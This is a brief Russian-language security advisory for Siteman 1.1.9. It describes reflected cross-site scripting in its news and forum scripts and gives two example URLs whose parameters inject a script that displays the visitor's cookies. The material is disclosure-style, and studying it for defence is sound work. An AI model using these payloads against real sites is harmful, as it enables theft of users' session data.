Программа: Siteman 1.1.9
Уязвимость позволяет злоумышленнику произвести XSS нападение и получить доступ к важным данным пользователей.
Уязвимость существует в сценариях news.php и forums.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы.
Пример:
http://[target]/forum.php?do=viewtopic& cat=1&topic=1&page=1?">
<script>alert(document.cookie)</script>
http://[target]/news.php?do=showone& id=1&page=1?" >< script>alert(document.cookie)</script>
